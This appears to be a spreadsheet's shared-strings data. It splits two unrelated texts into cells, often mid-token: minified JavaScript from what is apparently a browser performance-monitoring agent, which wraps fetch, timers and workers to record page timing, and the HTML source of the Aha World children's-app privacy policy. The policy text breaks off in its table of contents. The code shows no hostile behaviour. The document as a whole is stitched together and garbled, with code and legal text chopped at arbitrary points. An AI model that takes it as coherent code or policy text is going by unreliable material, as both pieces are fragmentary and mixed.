    <t>".concat(this.featureName," failed...")),this.abortHandler?.()}};h.v6?e():(0,l.b)((()=&gt;e()),!0)}}var v,m,b,y=i(2484),w=i(2053);class E extends p{constructor(r,n){let i=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];if(super(r,n,y.t9,i),("undefined"==typeof PerformanceNavigationTiming||u. T)&amp;&amp;"undefined"!=typeof PerformanceTiming){const n=(0,t.</t>
  </si>
  <si>
    <t>OP)(r);n[y. Dz]=Math.max(Date.now()-n.offset,0),(0,l. K)((()=&gt;n[y.qw]=Math.max((0,w.z)()-n[y.</t>
  </si>
  <si>
    <t>Dz],0))),(0,l.b)((()=&gt;{const t=(0,w.z)();n[y. OJ]=Math.max(t-n[y. Dz],0),(0,c.p)("timing",["load",t],void 0,e.</t>
  </si>
  <si>
    <t>D.pageViewTiming,this.ee)}))}this.importAggregator()}}v=E,m="featureName",b=y.t9,(m=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value. ")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(m))in v?Object.defineProperty(v,m,{value:b,enumerable:!0,configurable:!0,writable:!0}):v[m]=b;var A=i(9557),x=i(7022);class T extends A.w{constructor(e){super(e),this.aggregatedData={}}store(e,t,r,n,i){var o=this.getBucket(e,t,r,i);return o.metrics=function(e,t){t||(t={count:0});return t.count+=1,(0,x. D)(e,(function(e,r){t[e]=_(r,t[e])})),t}(n,o.metrics),o}merge(e,t,r,n,i){var o=this.getBucket(e,t,n,i);if(o.metrics){var a=o.metrics;a.count+=r.count,(0,x.</t>
  </si>
  <si>
    <t>D)(r,(function(e,t){if("count"!==e){var n=a[e],i=r[e];i&amp;&amp;!i.c?a[e]=_(i.t,n):a[e]=function(e,t){if(!t)return e;t.c||(t=S(t.t));return t.min=Math.min(e.min,t.min),t.max=Math.max(e.max,t.max),t.t+=e.t,t.sos+=e.sos,t.c+=e.c,t}(i,a[e])}}))}else o.metrics=r}storeMetric(e,t,r,n){var i=this.getBucket(e,t,r);return i.stats=_(n,i.stats),i}getBucket(e,t,r,n){this.aggregatedData[e]||(this.aggregatedData[e]={});var i=this.aggregatedData[e][t];return i||(i=this.aggregatedData[e][t]={params:r||{}},n&amp;&amp;(i.custom=n)),i}get(e,t){return t?this.aggregatedData[e]&amp;&amp;this.aggregatedData[e][t]:this.aggregatedData[e]}take(e){for(var t={},r="",n=!1,i=0;i&lt;e.length;i++)t[r=e[i]]=j(this.aggregatedData[r]),t[r].length&amp;&amp;(n=!0),delete this.aggregatedData[r];return n?t:null}}function _(e,t){return null==e?function(e){e?e.c++:e={c:1};return e}(t):t?(t.c||(t=S(t.t)),t.c+=1,t.t+=e,t.sos+=e*e,e&gt;t.max&amp;&amp;(t.max=e),e&lt;t.min&amp;&amp;(t.min=e),t):{t:e}}function S(e){return{t:e,min:e,max:e,sos:e*e,c:1}}function j(e){return"object"!=typeof e?[]:(0,x. D)(e,N)}function N(e,t){return t}var D=i(6797),O=i(5526),P=i(2438);var R=i(6998),C=i(8544),I=i(6382);class k extends p{constructor(e,r){let n=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];super(e,r,I.t,n),h.il&amp;&amp;((0,t.</t>
  </si>
  <si>
    <t>OP)(e).initHidden=Boolean("hidden"===document.visibilityState),(0,R.N)((()=&gt;(0,c.p)("docHidden",[(0,w.z)()],void 0,I.t,this.ee)),!0),(0,C.bP)("pagehide",(()=&gt;(0,c.p)("winPagehide",[(0,w.z)()],void 0,I.t,this.ee))),this.importAggregator())}}!function(e,t,r){(t=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value. ")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r}(k,"featureName",I.t);const H=Boolean(h._A?.Worker),L=Boolean(h._A?.SharedWorker),z=Boolean(h._A?.navigator?.serviceWorker);let M,B,F;var U=i(6034);class W extends p{constructor(t,r){let n=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];super(t,r,U.t9,n),function(e){if(!M){if(H){M=Worker;try{h._A.Worker=r(M,"Dedicated")}catch(e){o(e,"Dedicated")}if(L){B=SharedWorker;try{h._A.SharedWorker=r(B,"Shared")}catch(e){o(e,"Shared")}}else n("Shared");if(z){F=navigator.serviceWorker.register;try{h._A.navigator.serviceWorker.register=(t=F,function(){for(var e=arguments.length,r=new Array(e),n=0;n&lt;e;n++)r[n]=arguments[n];return i("Service",r[1]?.type),t.apply(navigator.serviceWorker,r)})}catch(e){o(e,"Service")}}else n("Service");var t;return}n("All")}function r(e,t){return"undefined"==typeof Proxy?e:new Proxy(e,{construct:(e,r)=&gt;(i(t,r[1]?.type),new e(...r))})}function n(t){h.v6||e("Workers/".concat(t,"/Unavailable"))}function i(t,r){e("Workers/".concat(t,"module"===r?"/Module":"/Classic"))}function o(t,r){e("Workers/".concat(r,"/SM/Unsupported")),(0,g.</t>
  </si>
  <si>
    <t>Z)("NR Agent: Unable to capture ".concat(r," workers."),t)}}((t=&gt;(0,c.p)(U.xS,[t],void 0,e. D.metrics,this.ee))),this.importAggregator()}}!function(e,t,r){(t=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value.</t>
  </si>
  <si>
    <t>")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r}(W,"featureName",U.t9);var q=i(3916),G=i(3752),V=i(8683),X=i.n(V);const $="nr@original";var Z=Object.prototype.hasOwnProperty,Y=!1;function Q(e,t){return e||(e=G.ee),r.inPlace=function(e,t,n,i,o){n||(n="");var a,s,c,u="-"===n.charAt(0);for(c=0;c&lt;t.length;c++)ee(a=e[s=t[c]])||(e[s]=r(a,u?s+n:n,i,s,o))},r.flag=$,r;function r(t,r,i,o,a){return ee(t)?t:(r||(r=""),nrWrapper[$]=t,K(t,nrWrapper,e),nrWrapper);function nrWrapper(){var s,c,u,f;try{c=this,s=X()(arguments),u="function"==typeof i?i(s,c):i||{}}catch(t){J([t,"",[s,c,o],u],e)}n(r+"start",[s,c,o],u,a);try{return f=t.apply(c,s)}catch(e){throw n(r+"err",[s,c,e],u,a),e}finally{n(r+"end",[s,c,f],u,a)}}}function n(r,n,i,o){if(!Y||t){var a=Y;Y=!0;try{e.emit(r,n,i,t,o)}catch(t){J([t,r,n,i],e)}Y=a}}}function J(e,t){t||(t=G.ee);try{t.emit("internal-error",e)}catch(e){}}function K(e,t,r){if(Object.defineProperty&amp;&amp;Object.keys)try{return Object.keys(e).forEach((function(r){Object.defineProperty(t,r,{get:function(){return e[r]},set:function(t){return e[r]=t,t}})})),t}catch(e){J([e],r)}for(var n in e)Z.call(e,n)&amp;&amp;(t[n]=e[n]);return t}function ee(e){return!(e&amp;&amp;e instanceof Function&amp;&amp;e.apply&amp;&amp;!e[$])}var te="fetch-",re=te+"body-",ne=["arrayBuffer","blob","json","text","formData"],ie=h._A.Request,oe=h._A.Response,ae="prototype",se="nr@context";const ce={};function ue(e){const t=function(e){return(e||G.ee).get("fetch")}(e);if(!(ie&amp;&amp;oe&amp;&amp;h._A.fetch))return t;if(ce[t.debugId]++)return t;function r(e,r,n){var i=e[r];"function"==typeof i&amp;&amp;(e[r]=function(){var e,r=X()(arguments),o={};t.emit(n+"before-start",[r],o),o[se]&amp;&amp;o[se].dt&amp;&amp;(e=o[se].dt);var a=i.apply(this,r);return t.emit(n+"start",[r,e],a),a.then((function(e){return t.emit(n+"end",[null,e],a),e}),(function(e){throw t.emit(n+"end",[e],a),e}))},e[r][$]=i)}return ce[t.debugId]=1,ne.forEach((e=&gt;{r(ie[ae],e,re),r(oe[ae],e,re)})),r(h._A,"fetch",te),t.on(te+"end",(function(e,r){var n=this;if(r){var i=r.headers.get("content-length");null!==i&amp;&amp;(n.rxSize=i),t.emit(te+"done",[null,r],n)}else t.emit(te+"done",[e],n)})),t}const fe={},de="setTimeout",le="setInterval",he="clearTimeout",ge="-start",pe=[de,"setImmediate",le,he,"clearImmediate"];function ve(e){const t=function(e){return(e||G.ee).get("timer")}(e);if(fe[t.debugId]++)return t;fe[t.debugId]=1;var r=Q(t);return r.inPlace(h._A,pe.slice(0,2),de+"-"),r.inPlace(h._A,pe.slice(2,3),le+"-"),r.inPlace(h._A,pe.slice(3),he+"-"),t.on(le+ge,(function(e,t,n){e[0]=r(e[0],"fn-",null,n)})),t.on(de+ge,(function(e,t,n){this.method=n,this.timerDuration=isNaN(e[1])?0:+e[1],e[0]=r(e[0],"fn-",this,n)})),t}const me={};function be(e){const t=function(e){return(e||G.ee).get("raf")}(e);if(!h.il||me[t.debugId]++)return t;me[t.debugId]=1;var r=Q(t);return r.inPlace(window,["requestAnimationFrame"],"raf-"),t.on("raf-start",(function(e){e[0]=r(e[0],"fn-")})),t}const ye={},we=["pushState","replaceState"];function Ee(e){const t=function(e){return(e||G.ee).get("history")}(e);return!h.il||ye[t.debugId]++||(ye[t.debugId]=1,Q(t).inPlace(window.history,we,"-")),t}const Ae={},xe=["appendChild","insertBefore","replaceChild"];function Te(e){const t=function(e){return(e||G.ee).get("jsonp")}(e);if(!h.il||Ae[t.debugId])return t;Ae[t.debugId]=!0;var r=Q(t),n=/[?&amp;](?:callback|cb)=([^&amp;#]+)/,i=/(.*)\.([^.]+)/,o=/^(\w+)(\.|$)(.*)$/;function a(e,t){var r=e.match(o),n=r[1],i=r[3];return i?a(i,t[n]):t[n]}return r.inPlace(Node.prototype,xe,"dom-"),t.on("dom-start",(function(e){!function(e){if(!e||"string"!=typeof e.nodeName||"script"!==e.nodeName.toLowerCase())return;if("function"!=typeof e.addEventListener)return;var o=(s=e.src,c=s.match(n),c?c[1]:null);var s,c;if(!o)return;var u=function(e){var t=e.match(i);if(t&amp;&amp;t.length&gt;=3)return{key:t[2],parent:a(t[1],window)};return{key:e,parent:window}}(o);if("function"!=typeof u.parent[u.key])return;var f={};function d(){t.e</t>
  </si>
  <si>
    <t>&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="UTF-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="ie=edge"&gt;
    &lt;title&gt;Aha World Privacy Policy&lt;/title&gt;
    &lt;style type="text/css"&gt;
        .view {
            padding: 0;
            word-wrap: break-word;
            cursor: text;
            height: 90%;
        }
        body {
            margin: 8px;
            font-family: sans-serif;
            font-size: 16px;
        }
        p {
            margin: 5px 0;
        }
        p {
            text-indent: 2em;
            line-height: 18pt;
        }
        span{
            line-height: 18pt;
        }
        /* * {
            margin-left: 0 !important;
        } */
        *{
            font-family: initial !important;
            color: #575757 ;
        }
        a[href],a[href] *{
            color: rgb(68, 114, 196);
        }
        .container {
            padding: 20px;
            max-width: 1000px;
            margin: 0 auto !important;
            color: #575757;
            font-size: 18px;
        }
    &lt;/style&gt;
&lt;/head&gt;
&lt;body class="view"&gt;
    &lt;div class="container"&gt;
        &lt;p class="MsoNormal" align="center"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;text-align:center;"&gt;
            &lt;div&gt;&lt;p style="text-align: center;font-weight: bold;"&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span class="size"
                            style="font-size:16pt"&gt;Aha World Privacy Policy&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;/p&gt;
        &lt;p class="MsoNormal" align="center"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;text-align:center;"&gt;
            &lt;b&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span
                            class="size" style="font-size:12pt"&gt;Effective date&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;b class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;:&amp;nbsp;October 28, 2022 &lt;/span&gt;&lt;/b&gt;
        &lt;/p&gt;
        &lt;p class="MsoNormal" align="center"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;text-align:center;"&gt;
            &lt;b&gt;&lt;b&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span class="size"
                            style="font-size:14pt"&gt;Preamble&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;
        &lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;&lt;span
                class="font" style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;
                    &lt;/span&gt;&lt;/span&gt;&lt;span class="font" style="font-family:宋体"&gt;&lt;span class="size"
                    style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span
                    class="size"
                    style="font-size:12pt"&gt;Aha World Products and/or Services provided by&amp;nbsp;&lt;a
                        name="_Hlk24835756"&gt;AHA WORLD LIMITED&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span
                class="font" style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&amp;nbsp;(registered
                    address:&lt;/span&gt;&lt;/span&gt;&lt;span class="font" style="font-family:等线"&gt;&lt;span class="size"
                    style="font-size:10.5pt"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span
                    class="size" style="font-size:12pt"&gt;suite 603, 6/F laws comm plaza, 788 cheung sha wan rd kln, Hong
                    Kong,&amp;nbsp;hereinafter referred to “AW” "We" "Our" or "Us") to Users (hereinafter referred to as
                    "You"
                    or "Your") and/or Your Child include online children education products and/or services, including
                    but
                    not limited to our official websites (hereinafter referred to as "Official Website") and &amp;nbsp;AW
                    Children Apps (see&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;a href="#id_11"&gt;&lt;u&gt;&lt;span class="colour"
                            style="color:rgb(68, 114, 196)"&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span
                                    class="size" style="font-size:12pt"&gt;&lt;u&gt;Definition of Key
                                        Words&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&amp;nbsp;for details), as well as other
                    products and/or services provided by Us to You from time to time. Aha World Privacy Policy (as
                    amended
                    from time to time) (hereinafter referred to as "this&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;i&gt;&lt;span class="font"
                        style="font-family:Arial"&gt;&lt;span class="size"
                            style="font-size:12pt"&gt;Policy&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/i&gt;&lt;span class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;") is hereby formulated by Us in
                    accordance with the Applicable Laws to protect the security of personal information about You and/or
                    Your Child as well as to safeguard lawful processing activities.&lt;/span&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;!--</t>
  </si>
  <si>
    <t>&lt;p class="MsoNormal" style="margin-bottom:10.0000pt;mso-add-space:auto;mso-pagination:widow-orphan;"&gt;&lt;/p&gt; --&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;&lt;span
                class="font" style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;All AW Products and/or
                    Services are governed by this&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;i&gt;&lt;span class="font"
                        style="font-family:Arial"&gt;&lt;span class="size"
                            style="font-size:12pt"&gt;Policy&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/i&gt;&lt;span class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;. AW Products and/or Services are
                    applicable to children and Users who have reached the age threshold of adult under the Applicable
                    Laws.
                     &lt;/span&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt; Parents can
                    review
                    personal information collected about the Child, have this information deleted, and request Us about
                    no
                    further collection or use of the Child’s Personal Information.</t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;&lt;span
                class="font" style="font-family:Arial"&gt;&lt;span class="size"
                    style="font-size:12pt"&gt;This&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;i&gt;&lt;span class="font"
                        style="font-family:Arial"&gt;&lt;span class="size"
                            style="font-size:12pt"&gt;Policy&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/i&gt;&lt;span class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&amp;nbsp;sets out why, how and what
                    personal information We collect, use, store, entrust processing, share, transfer and publicly
                    disclose
                    about You and/or Your Child, the information security protection measures We take, and the rights
                    and
                    methods We make available to You for Your access, update, deletion and control of Your and/or Your
                    Child’s personal information. Please read this&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;i&gt;&lt;span class="font"
                        style="font-family:Arial"&gt;&lt;span class="size"
                            style="font-size:12pt"&gt;Policy&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/i&gt;&lt;span class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&amp;nbsp;in combination
                    with&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href="https://www.ahaworld.com/terms/en/terms.html"&gt;&lt;span class="colour" style="color:rgb(68, 114, 196)"&gt;&lt;span class="font"
                        style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;u&gt;Terms of Service&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span
                    class="size" style="font-size:12pt"&gt;. If You do not acknowledge and agree to
                    this&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;i&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span class="size"
                            style="font-size:12pt"&gt;Policy&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/i&gt;&lt;span class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;, You shall stop using AW Products
                    and/or Services.&lt;/span&gt;&lt;/span&gt;&lt;span class="font" style="font-family:宋体"&gt;&lt;span class="size"
                    style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;&lt;span
                class="font" style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;Please note the
                    following
                    which are very important to remind you:&lt;/span&gt;&lt;/span&gt;&lt;span class="font" style="font-family:宋体"&gt;&lt;span
                    class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;&lt;span
                class="font" style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;1.</t>
  </si>
  <si>
    <t>All key contents are
                    "&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;b&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span class="size"
                            style="font-size:12pt"&gt;in bold&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;span class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;".&lt;/span&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;&lt;span
                class="font" style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;2. Capitalized terms
                    used
                    in this&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;i&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span class="size"
                            style="font-size:12pt"&gt;Policy&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/i&gt;&lt;span class="font"
                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&amp;nbsp;have the same meanings given
                    in
                    the Terms of Service, unless explicitly stated otherwise. In addition, we set out interpretations of
                    capitalized terms in Section 11 below as definition of key words.&lt;/span&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;b&gt;&lt;b&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;3.</t>
  </si>
  <si>
    <t>Pursuant to
                            the
                            Applicable Laws, You confirm and undertake that You are the parent of the Child who uses
                        &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;b&gt;&lt;b&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span class="size"
                            style="font-size:12pt"&gt;AW&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;b&gt;&lt;b&gt;&lt;span class="font"
                        style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&amp;nbsp;Products and/or
                            Services
                            or an adult User who is at/over the legal age threshold in your jurisdiction or
                            above.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;span class="font" style="font-family:宋体"&gt;&lt;span class="size"
                    style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;
        &lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;b&gt;&lt;b&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;4.
                             This&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;b&gt;&lt;i&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;Policy&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;b&gt;&lt;span class="font"
                        style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&amp;nbsp;consists of
                            two parts: (I) the General Terms; and (II) the Special Terms which are set forth in the
                            Jurisdiction Schedule. Please note that the Special Terms, forming part of
                            this&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;b&gt;&lt;i&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;Policy&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;b&gt;&lt;span class="font"
                        style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;, contain terms and
                            conditions which are specific to the relevant jurisdictions in which AW Products and/or
                            Services
                            are being made available.</t>
  </si>
  <si>
    <t>For the avoidance of doubt, the terms and conditions in the
                            Special
                            Terms shall apply specifically only to the Users who are using AW Products and/or Services
                            in
                            the corresponding jurisdictions. In the event that there is any inconsistency between the
                            General Terms and the Special Terms, the Special Terms shall prevail to the extent necessary
                            to
                            resolve such inconsistency.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;
        &lt;/p&gt;
        &lt;p class="MsoNormal" align="center"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;text-align:center;"&gt;
            &lt;b&gt;&lt;span class="colour" style="color:rgb(46, 116, 181)"&gt;&lt;b&gt;&lt;span class="font"
                            style="font-family:Arial"&gt;&lt;span class="size"
                                style="font-size:12pt"&gt;&lt;br&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;b&gt;&lt;span class="font"
                        style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;TABLE OF
                            CONTENTS&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;span class="font" style="font-family:宋体"&gt;&lt;span class="size"
                    style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;
        &lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_0"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;u&gt;I GENERAL
                                        TERMS&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_1"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;1&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span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We collect and use personal information
                                        about You and/or
                                        Your Child&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_2"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;2&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span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We use cookies/similar
                                        technologies&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_3"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;3&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span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We subcontract the processing, share,
                                        transfer or publicly
                                        disclose personal information about You and/or Your
